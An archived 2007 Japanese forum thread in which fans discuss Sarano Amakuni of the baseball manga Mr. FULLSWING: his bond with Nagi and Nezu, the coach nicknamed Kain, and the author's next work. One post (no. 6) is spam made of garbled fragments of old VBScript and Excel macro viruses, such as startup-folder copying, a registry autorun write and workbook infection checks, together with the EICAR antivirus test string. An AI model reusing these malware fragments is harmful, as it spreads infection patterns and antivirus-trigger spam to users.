5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ミスフル】猿野天国4

1 :名無しかわいいよ名無し:2007/10/28(日) 13:54:58 ID:LEY/OaBf
猿野をメインに因縁を考察するなり、将来予想するなりマンセーするなり好きにどうぞ。
一応ファンスレですので、極端な叩き・批判はキャラアンチスレへ。

三代目
【ミスフル】猿 野 天 国 と い う 男 3
http://anime2.2ch.net/test/read.cgi/cchara/1164114459/
二代目スレ
【ミスフル】猿 野 天 国 2
http://comic6.2ch.net/test/read.cgi/cchara/1139975473/
初代スレ
【ミスフル】猿 野 天 国
http://comic6.2ch.net/test/read.cgi/cchara/1133795661/

関連スレ
【ミスフル】犬飼冥【剛球左腕】
http://anime2.2ch.net/test/read.cgi/cchara/1190730916/
御    柳    芭    唐     13
http://anime2.2ch.net/test/read.cgi/csaloon/1161695206/

避難所
http://jbbs.livedoor.jp/comic/3102/

2 :名無しかわいいよ名無し:2007/10/28(日) 14:01:14 ID:pyjnBBrQ
2ゲト
乙!

3 :名無しかわいいよ名無し:2007/10/28(日) 15:43:34 ID:LEY/OaBf
とりあえず検索問題から
スレタイは縮めた。

しかし最近のキャラ板はサロン以上の激戦区だ。

4 :名無しかわいいよ名無し:2007/10/28(日) 16:21:40 ID:PgIq/P+1
乙乙

5 :名無しかわいいよ名無し:2007/10/28(日) 17:30:53 ID:zZgyZTsZ
乙。
今後はかならず一日一保守せねばならんな。

6 :名無しかわいいよ名無し:2007/10/28(日) 18:21:16 ID:2Mr2cYgE
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


7 :名無しかわいいよ名無し:2007/10/28(日) 19:26:59 ID:vqW/wVtx
ほぼ30時間で落ちるってすげーな。

8 :名無しかわいいよ名無し:2007/10/28(日) 19:39:30 ID:gCNHlcsT
>>1乙!
保守

9 :名無しかわいいよ名無し:2007/10/29(月) 01:18:00 ID:TfFLuUOn
猿野はもう童貞卒業したのかな

10 :名無しかわいいよ名無し:2007/10/29(月) 01:20:52 ID:+KMyyeyP
一日一猿

11 :名無しかわいいよ名無し:2007/10/29(月) 02:41:44 ID:OnXf5zf1
凪さんは
あっさりやらせてくれるか
まったくやらせてくれないかのどちらかだな。

12 :名無しかわいいよ名無し:2007/10/29(月) 08:28:24 ID:91uaWi7h
案外と凪さんの方が処女捨てたがってて
猿野の方が大事にしたがってるとかw
でも「二人の時は優しい」発言もあるからなあ…覗きで発散か?

13 :名無しかわいいよ名無し:2007/10/29(月) 14:10:27 ID:MfLiL+Xb
IDがミスフル記念真喜子
天国の告白シーン好きだった

14 :名無しかわいいよ名無し:2007/10/30(火) 04:55:47 ID:aGMwAlE+
>覗き
猿野のこれは別のところからくる行動(衝動)ではw

15 :名無しかわいいよ名無し:2007/10/30(火) 07:13:28 ID:dTs/B39F
保守

16 :名無しかわいいよ名無し:2007/10/30(火) 12:21:48 ID:5TdQ2kPM
猿野は家の手伝いしてたみたいだけど覗きとかしたら母が呼び出されるのではw

17 :名無しかわいいよ名無し:2007/10/30(火) 13:01:47 ID:Qnm81/uB
小学生の頃は
スカートめくりとかして
おかん呼び出されてたに一票

18 :名無しかわいいよ名無し:2007/10/30(火) 14:19:50 ID:uiHQWt5S
ミスフルキャラで童貞だと思われる人
十二支:猿、沢松、兎、犬、辰、子、猪、鹿、象、
非童貞?→虎、牛、蛇、馬(?)ほか誰か居たっけ
他校:童貞→ユタ、沖、妙、ワンタン、ほか
非童貞?→ウドン、ひじかた、ケンビシ、双子
絶対童貞じゃない→御柳

19 :名無しかわいいよ名無し:2007/10/30(火) 16:55:35 ID:dTs/B39F
司馬は童貞だろ…

御柳wwwwww

20 :名無しかわいいよ名無し:2007/10/30(火) 21:18:32 ID:ffI71o+P
>17
担任羨ましい。

21 :名無しかわいいよ名無し:2007/10/30(火) 22:45:34 ID:R1L2tKmw
担任男とは限らないぞw

22 :名無しかわいいよ名無し:2007/10/30(火) 23:48:50 ID:v25FU+CY
>>18
蛇とひじかたと双子兄(姉?)は童貞だろう

23 :名無しかわいいよ名無し:2007/10/31(水) 02:41:49 ID:d0Ey9Y1x
ひじかたそうかなー?
姉は女は無さそうだけど男あr
一宮はどうだろう

24 :名無しかわいいよ名無し:2007/10/31(水) 12:07:47 ID:gYZCyCf/
>>12
「優しさ」にもいろいろあるしなあ

25 :名無しかわいいよ名無し:2007/10/31(水) 13:37:30 ID:63N2FreG
深黄泉…深読みしたらそれこそセクロス時は優しいかもしれんしなw

26 :名無しかわいいよ名無し:2007/10/31(水) 16:04:58 ID:d0Ey9Y1x
可愛いなぁ本当に可愛いカップルだよ

27 :名無しかわいいよ名無し:2007/10/31(水) 16:47:49 ID:qt/0Cg/v
この漫画、背番号は設定されてないのか?

28 :名無しかわいいよ名無し:2007/10/31(水) 19:52:30 ID:kO3BWNgX
>>25
だから覗きはスルーかw

29 :名無しかわいいよ名無し:2007/11/01(木) 07:54:50 ID:eiXhWyAg
猿野は凪さんを凄い大事にしたいと思ってるだろうし
実際するだろうけど
猿野も何か感覚がちょい変なので
どんな優しさなんか少し心配だw

30 :名無しかわいいよ名無し:2007/11/01(木) 08:24:35 ID:nGfZwFg9
その辺は凪さんも感覚ずれてる所あるから割れ鍋にとじ蓋カップルで大丈夫ではないかとw

31 :名無しかわいいよ名無し:2007/11/01(木) 23:38:31 ID:qtEPVvZJ
凪さんの好きの意味が男女のそれではなかったら怖いような凄いような

32 :名無しかわいいよ名無し:2007/11/02(金) 00:09:36 ID:RrKy7Vn3
シスコンケンビシにーちゃんはどう思ってんだろね

33 :名無しかわいいよ名無し:2007/11/02(金) 07:49:41 ID:0DdxeY1H
本当に妹がかわいかったら
妹が自分で選んだ相手につべこべは言わんだろう。

剣菱が「本当に」妹がかわいいのかどうかは
また別の問題だけど。

34 :名無しかわいいよ名無し:2007/11/03(土) 00:09:33 ID:sUE5xioD
剣菱の心理はともかく
何やかや理由付けて二人の間に割って入りそうな気はするw


35 :名無しかわいいよ名無し:2007/11/03(土) 08:34:43 ID:PzlcEv/9
確かにWWW桜木と違ってめっちゃ媚びてたからなぁW


36 :名無しかわいいよ名無し:2007/11/03(土) 19:08:54 ID:LQXO3Fqh
ゴリって基本妹に無関心じゃなかった?
それ以前に桜木の晴子への恋心に気付いてなかった気もするけど。

37 :名無しかわいいよ名無し:2007/11/04(日) 00:52:42 ID:Ownfbha7
ゴリ、「春子に触るな」とか言ってなかったっけ?
剣菱きもい、中宮影州かっこいい

38 :名無しかわいいよ名無し:2007/11/04(日) 00:58:17 ID:TGn7GfiZ
剣菱→シスコン
紅院→カマ
屑桐→家族思い
魁→厳格
黄泉→基地外

どう思う?

39 :名無しかわいいよ名無し:2007/11/04(日) 02:06:49 ID:vH4yabT/
兄だったら嫌だ順

剣菱(シスコン以外でも色々論外)
→黄泉(基地だがちょっとだけ同情)
→屑桐(変なプライド高過ぎでめんどい)
→魁(屑桐とは別の意味でめんどくさそう)
→紅印(性的嗜好以外はまともっぽい)

40 :名無しかわいいよ名無し:2007/11/04(日) 17:33:02 ID:hHEvrUOO
鈴木信也はまだ新作書いて無いの?

41 :名無しかわいいよ名無し:2007/11/04(日) 20:25:26 ID:8vkghw8d
そろそろ信也の新作読みたいな。
チキンガンこけたから違う方向の作品でも
ミスフルの続編でもいい。

42 :名無しかわいいよ名無し:2007/11/04(日) 20:44:38 ID:Ownfbha7
自分的には猿野と凪さんの子供が主役の話がいいなぁ

43 :名無しかわいいよ名無し:2007/11/04(日) 21:21:48 ID:8vkghw8d
男塾やリンかけかよw
メインキャラの子供たちが主役。

44 :名無しかわいいよ名無し:2007/11/05(月) 07:59:45 ID:PRPCCJvL
とりあえず登場人物は出し過ぎないでほしいなぁ

45 :名無しかわいいよ名無し:2007/11/05(月) 08:24:18 ID:295/etRQ
初期の珍也の絵で頼む。最近の絵は嫌い


ミスフルの続編はこれまたコケそうだからやめr(ry

46 :名無しかわいいよ名無し:2007/11/05(月) 14:09:08 ID:xHQrWwWJ
>>44
無計画にぽんぽんキャラを出してしまうのが信也の欠点だからな。
キャラ自体はどれもいい味出してるけど。

47 :名無しかわいいよ名無し:2007/11/05(月) 21:44:24 ID:91G17KlE
中期の画が好きだ。

48 :名無しかわいいよ名無し:2007/11/06(火) 00:43:19 ID:Rg7cgRvQ
キャラのセンスはあるから一人ずつ大切に扱ってほしいな。

49 :名無しかわいいよ名無し:2007/11/06(火) 07:22:43 ID:a9r6B2JZ
本当にセンスあると思ってる?
口癖や顔のペイントで区別してるだけだぞ。

次回作ではこういう所を直してほしい。

50 :名無しかわいいよ名無し:2007/11/06(火) 08:07:34 ID:uvS8idvM
外見・口調はわざとらしいけど内面のキャラ立ちはしっかりしてると思う。

51 :名無しかわいいよ名無し:2007/11/06(火) 19:34:48 ID:HOHgRGzi
男キャラはいいけどもっと魅力的な女性キャラをたくさん描けないと。
野球漫画とはいえヒロインの影が薄いというかキャラが弱かった。

52 :名無しかわいいよ名無し:2007/11/06(火) 22:22:02 ID:a9r6B2JZ
確かに…凪は中盤空気だったかも
スポーツ漫画ヒロインの宿命だが。

53 :名無しかわいいよ名無し:2007/11/07(水) 00:26:00 ID:QHhdqgVX
凪は普通にキャラ立ってると思うけど
キャラが主張してるわけじゃなく、ポジションや設定が大きいだけなのかも。
犬の時にも言われてたけど何考えてるか分からないところがある。

しかし好き嫌い抜きにミスフルの女性キャラってほとんど不要っつーかお飾りだな。
女子マネはいてもいなくても話に差し支えないしディエチは男でも支障はない。
次回作はもっと話に関わってくるようなキャラを出してほしい。

54 :名無しかわいいよ名無し:2007/11/07(水) 01:10:08 ID:mKYUpbnf
徹底してお飾り&
思考不明だったからこそ
他作品であるような
汚い叩きは見なくて済んだところもあるだろうな。

55 :名無しかわいいよ名無し:2007/11/07(水) 20:25:07 ID:R8hILnDj
凪は
影が薄いのに
存在感はある、というある意味珍しいヒロインだと思う。

56 :名無しかわいいよ名無し:2007/11/07(水) 21:29:59 ID:QHhdqgVX
主人公である猿野の行動が凪への思いに根ざしているからだろう。

猿野が出ている限り凪の影はついて回るから。

57 :名無しかわいいよ名無し:2007/11/07(水) 23:25:58 ID:9q7yRBMl
凪に失恋したと勘違いして野球部辞めてたしね

58 :名無しかわいいよ名無し:2007/11/08(木) 14:50:23 ID:cpz7QLmi
そもそも凪がいなかったら話が始まっていないw

59 :名無しかわいいよ名無し:2007/11/08(木) 22:42:26 ID:m5jbOtXs
子津くん(キャプテン)とはまだ仲良し?

60 :名無しかわいいよ名無し:2007/11/09(金) 07:18:27 ID:e0jqBVdr
は?

61 :名無しかわいいよ名無し:2007/11/09(金) 08:01:40 ID:IhSh+eHB
最終回でもつるんでたし別に仲たがいした様子も見受けられないしいいんじゃないだろか。

…とか言ってて派手に喧嘩して屑牛・御犬みたいな因縁作ったらワロスw

62 :名無しかわいいよ名無し:2007/11/09(金) 18:41:23 ID:GyEs6vR8
子津もけっこう粘着気質だしなw

63 :名無しかわいいよ名無し:2007/11/10(土) 01:18:17 ID:GeAXio59
子津「あいつのせいで僕は野球の道を断たれたんすよ…」

64 :名無しかわいいよ名無し:2007/11/10(土) 08:13:47 ID:pffT/ICW
絶対無い(´∀`)むしろ猿のお陰で野球できたぁ

65 :名無しかわいいよ名無し:2007/11/10(土) 10:41:32 ID:xI5hls6I
通りすがりですが、ミスフル懐かしいな〜
猿野と沢松のアホコンビが大好きだった。2人のノリがツボw
でもそれって最初らへんと中盤と最後しかでてないんだよね。。
あ〜懐かしい…

66 :名無しかわいいよ名無し:2007/11/10(土) 12:47:12 ID:Ungqk2iL
何かここ腐女子ばっかになってきたね。
男性はいないのか

67 :名無しかわいいよ名無し:2007/11/10(土) 18:19:03 ID:U/+4Wpd9
>>64
猿野がいなかったら
最初の試験で落ちてたしな。

68 :名無しかわいいよ名無し:2007/11/10(土) 20:38:01 ID:Ci+4f0bS
凪さんや犬飼や家族関係の話題に占められがちだけど
子津も猿野に関わり大きく影響を及ぼした内の一人だな。
子津は猿野がいなかったら入部できなかったかもしれないけど
猿野だって子津がいなかったら継続できなかったろう。

69 :名無しかわいいよ名無し:2007/11/11(日) 16:41:17 ID:CfPEp8MV
持ちつ持たれつの良い関係だな。

70 :名無しかわいいよ名無し:2007/11/11(日) 23:08:33 ID:DpiVWFmo
猿が「夢はどこにも逃げやしない」って子津に言ったんだっけ?抱き合ってくれ

71 :名無しかわいいよ名無し:2007/11/11(日) 23:21:46 ID:u6ITGcfi
黒豹事故で捕手を買って出たのはカーブ打ちで世話になった恩返しかなと思って感動した。

72 :名無しかわいいよ名無し:2007/11/12(月) 07:18:59 ID:t9AxY3Ba
夢はどこにも逃げやしないを関智ボイスで変換

73 :名無しかわいいよ名無し:2007/11/12(月) 18:20:06 ID:EP6alZWz
スネちゃまボイスか

74 :名無しかわいいよ名無し:2007/11/13(火) 01:27:18 ID:O/kc7+0g
子津と猿野は相互補完型だからな

黒撰戦での子津回想の時、
ほとんど猿野との記憶だったのはちょっと笑ったが。

75 :名無しかわいいよ名無し:2007/11/13(火) 19:28:48 ID:cjPQO2MV
一度賊軍落ちしたあとは
ほとんど引きこもって
猿野と練習してるか
羊谷に特訓つけてもらってるかのどっちかだったからだw

76 :名無しかわいいよ名無し:2007/11/13(火) 20:52:33 ID:E3gz2oe2
黒豹っていい奴だな

77 :名無しかわいいよ名無し:2007/11/13(火) 21:34:30 ID:FsRYriyO
いや、黒豹は報酬せしめる気満々だったぞw
もちろん子津の熱意に打たれたからこそ手助けしてまけてやったんだけどな。

78 :名無しかわいいよ名無し:2007/11/14(水) 06:58:27 ID:cEPCNWJh
>>75
羊谷は最初教えた後は放置だったような。
カイン→空蝉組のごとく

79 :名無しかわいいよ名無し:2007/11/14(水) 14:03:10 ID:bU5LGy80
それでも羊谷は何回かに渡って指導している描写がある。
カインなんか「はいやって」で終わって
途中「10枚切れないと完成じゃないよ^^」とプレッシャーかけたくせに
決勝前日くらいに「えーっ、まだ出来てないのー!?」とか驚いてるずさんさだからなw

80 :名無しかわいいよ名無し:2007/11/14(水) 23:22:37 ID:driDp6Ju
改めて言われるとカイン凄いよな
別の意味でw

81 :名無しかわいいよ名無し:2007/11/15(木) 22:10:51 ID:nUPTFcSc
所謂「枠外」で羊谷が指導してたかどうかは保留でも
カインは確実に放置してたからなw

82 :名無しかわいいよ名無し:2007/11/16(金) 12:05:10 ID:1CKrLXoI
放置した挙句にあの言い草だしな・・・

黒撰戦の時に色々心配してた羊谷が
ものすごく真っ当に見える。

83 :名無しかわいいよ名無し:2007/11/16(金) 22:08:38 ID:7XUI/pqi
しかし付きっ切りで面倒みて貰ってた犬飼が
よかったのかどうかを考えると・・・。

84 :名無しかわいいよ名無し:2007/11/16(金) 22:52:10 ID:ttJXOJck
結果としては良かったけど、
犬的にはありがた迷惑ってところか?w

85 :名無しかわいいよ名無し:2007/11/17(土) 12:53:51 ID:CZhjjbJh
いてもいなくても迷惑な男、カイン

86 :名無しかわいいよ名無し:2007/11/17(土) 15:53:39 ID:MzQ1Mm+a
カインがラスボスであらゆる因縁の元凶だと思っていた時代が私にもありました

87 :名無しかわいいよ名無し:2007/11/18(日) 15:11:08 ID:wpVIaYuj
カイン…?

88 :名無しかわいいよ名無し:2007/11/19(月) 00:47:37 ID:qLfMMXgb
今は亡きw避難所用語スレから転載

カイン【通称】
埼玉選抜監督、白雪静山の通称。
週刊少年板が発祥。白雪初登場時、同じくジャンプに連載されていた
「カイン」という内水氏の漫画の、同名の主人公に由来する。
パイプをくわえている、あの眠そうな目つき、一見白そうで実は黒いなど
共通点が多数あり、いつしか白雪=カインと呼ばれるようになった。
しかし白雪は、決して腹から手を出したりはしない。

本名白雪よりこちらのほうが使用頻度がはるかに高い。

89 :名無しかわいいよ名無し:2007/11/19(月) 17:59:44 ID:a0QaToO7
また懐かしいものをw

90 :名無しかわいいよ名無し:2007/11/20(火) 19:26:48 ID:h8KYWiQP
>>79
ずさん通り越して嫌がらせだろあれはw

91 :名無しかわいいよ名無し:2007/11/20(火) 19:36:59 ID:XFmKrVyd
バッテリー組めてた大神はえらい人格者だよなw

92 :名無しかわいいよ名無し:2007/11/20(火) 20:00:24 ID:I1V5orgZ
案外当時はまだまともだったのかもしれんw
大神が死んでからああなったとか

93 :名無しかわいいよ名無し:2007/11/21(水) 12:06:35 ID:pr6h0CMx
そして今は思いっきりまともではない、と。

カインは猿野が大神に似てると気づいてたんかね。

94 :名無しかわいいよ名無し:2007/11/21(水) 14:33:45 ID:W2hHMRYT
カインってあの三人以外おもっくそ無関心だから
気付いてないか気付いていてもどうでもいい(そりゃそーだ)と思っているかのどちらかでは

95 :名無しかわいいよ名無し:2007/11/22(木) 12:06:45 ID:LDc+gnmk
>86
猿野の家庭事情に驚いてた時は
カインも人間だったんだとほっとしたw

96 :名無しかわいいよ名無し:2007/11/22(木) 22:28:25 ID:yWq6ErGF
あれ本当に驚いているのか?
何か親子関係自体に驚いているというより、
他の連中が知らなかった事に驚いているように見えてしまう訳だがw

97 :名無しかわいいよ名無し:2007/11/23(金) 16:48:56 ID:WYWi482L
カイン最恐伝説。

カインよりも
犬が驚いてるようにみえるところが問題だ。

98 :名無しかわいいよ名無し:2007/11/23(金) 17:18:29 ID:lI+gvLoT
そっちは親子関係自体にではなくてペラペラ喋る虎鉄のデリカシーのなさに驚いているのではw
まあ、猿野本人は別に隠す気はなかったがw

99 :名無しかわいいよ名無し:2007/11/24(土) 17:19:24 ID:TnGLMoNq
あれは事象事態にではなく
「(衆目に)知られてしまった」
驚きだろう。

いくらトコロテン頭wとか言われてたって
真面目に考えれば覚えてるだろうし

100 :名無しかわいいよ名無し:2007/11/24(土) 17:58:06 ID:u52ocpny
まあ、犬は思いやりで黙っていてやったわけでなく、
単に話す相手がいなかっただけだしなw

101 :名無しかわいいよ名無し:2007/11/24(土) 23:27:40 ID:jSlFLTmq
猿のって沢松以外に友達いないの

102 :名無しかわいいよ名無し:2007/11/25(日) 02:10:00 ID:GvFA7h7F
お前はミスフルの何を見てたんだ

103 :名無しかわいいよ名無し:2007/11/26(月) 00:34:40 ID:D+3FkeL6
空気読まずに質問しますよ


カインって誰?

104 :名無しかわいいよ名無し:2007/11/26(月) 00:36:55 ID:D+3FkeL6
と思ったら前の方に書いてあった
ageてゴメンなさいorz
暫くROMってるわ

105 :名無しかわいいよ名無し:2007/11/26(月) 06:28:46 ID:N/dTkk9W
>>102
野球部は置いといて沢松以外の友達、ってことじゃないか?
御柳VS犬因縁の時にユタに語った話をみると
中学生時代は沢松以外も友達いたっぽいけど。

106 :名無しかわいいよ名無し:2007/11/26(月) 07:44:41 ID:0ZM4Rmcl
それを言うなら他の連中も野球部以外に友達いるのって話にならん?
(入れ代わり見ると凪さんは友達いるっぽいが)
行間の隙間を読むのと違って必要ないから描かれていない部分をあれこれ論じても不毛じゃないか?

107 :名無しかわいいよ名無し:2007/11/26(月) 08:08:02 ID:w16o9PoU
でも大体同じ部活の人と仲良くなるよね。

108 :名無しかわいいよ名無し:2007/11/27(火) 00:50:14 ID:+kpoEGoG
部活の内容にもよるな。

109 :名無しかわいいよ名無し:2007/11/27(火) 02:35:57 ID:M1q951zl
変態華道部

110 :名無しかわいいよ名無し:2007/11/27(火) 12:06:22 ID:cjNf4mT/
そういえばw

111 :名無しかわいいよ名無し:2007/11/27(火) 22:52:17 ID:hKROBmqH
なかよくなりたくないつーか
そもそも入部したくないつーかw

112 :名無しかわいいよ名無し:2007/11/28(水) 01:00:39 ID:VicKjI+o
変態華道部って猿野と沢松しかいなかったんだよね?

113 :名無しかわいいよ名無し:2007/11/28(水) 22:23:49 ID:Cz6sA+P4
部活動を名乗っているだけで実際は猿野一人が好きにやっているのを
沢松が煽ってただけな気がするw

114 :名無しかわいいよ名無し:2007/11/29(木) 00:01:58 ID:l98TrYEN
沢松は写真撮るのが好きみたいね

115 :名無しかわいいよ名無し:2007/11/29(木) 08:17:50 ID:BeZAqe0H
という事は報道部に入ったのも自然な流れか

116 :名無しかわいいよ名無し:2007/11/30(金) 02:43:03 ID:iddQ9C18
写真部とか光画部とかはなかったんか

117 :名無しかわいいよ名無し:2007/11/30(金) 11:12:51 ID:jDi2oSl4
猿野しか友達がいなかったから変態華道部に入ったんじゃない?

118 :名無しかわいいよ名無し:2007/12/01(土) 01:11:29 ID:2XbiI6VZ
沢松は
出番ない、という持ちネタがある分
空白の期間が長いので
猿野以外の付き合いもそれなりにあると思える。

119 :名無しかわいいよ名無し:2007/12/01(土) 12:00:36 ID:ufJynpEO
野球部で新たに友人ができた猿野と同様に報道部には友人がいるんじゃないか?
梅さんとばかりつるんでるけど(それ以前に他の報道部員が出てないがw)
野球部班ってことは他の部署もあるはずだし

120 :名無しかわいいよ名無し:2007/12/01(土) 22:07:31 ID:wERjVwg+
竹が出てくると思ったんだけどなぁ…。
作ろうとはしてたけど描く余裕がなかったり、忘れたりしたんだろうね。

121 :名無しかわいいよ名無し:2007/12/02(日) 07:03:56 ID:PC+fUKr4
沢松の髪型が奇抜

122 :名無しかわいいよ名無し:2007/12/02(日) 12:44:18 ID:8O6/+Wnc
あれで奇抜だったら牛尾とかほっぺは何なんだw

123 :名無しかわいいよ名無し:2007/12/02(日) 22:50:29 ID:nG4Hhw//
沢松のは普通のオールバックだしな。
高校生が選択するものとしては珍しいが
現実にある髪型だ。

124 :名無しかわいいよ名無し:2007/12/03(月) 09:00:25 ID:3B1ImzQh
信也のセンスが伺える

125 :名無しかわいいよ名無し:2007/12/03(月) 19:42:45 ID:1qdm+Qym
梅さんの厚底ブーツに時代を感じた

126 :名無しかわいいよ名無し:2007/12/03(月) 20:05:30 ID:dNxCEFqO
それを言うなら犬飼の無駄なガングロ設定も…

127 :名無しかわいいよ名無し:2007/12/03(月) 23:50:22 ID:LnyN9r/6
一応特徴付けなんだろ>ガングロ

ただガングロで
眼と髪があれならいっそ
外国人、とか設定しておいてもよかったかも。

128 :名無しかわいいよ名無し:2007/12/04(火) 00:11:29 ID:ziOUO0DE
ガングロなら虎みたいなキャラの方が合ってる気がしない?犬って根暗なのに見た目が派手派手

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)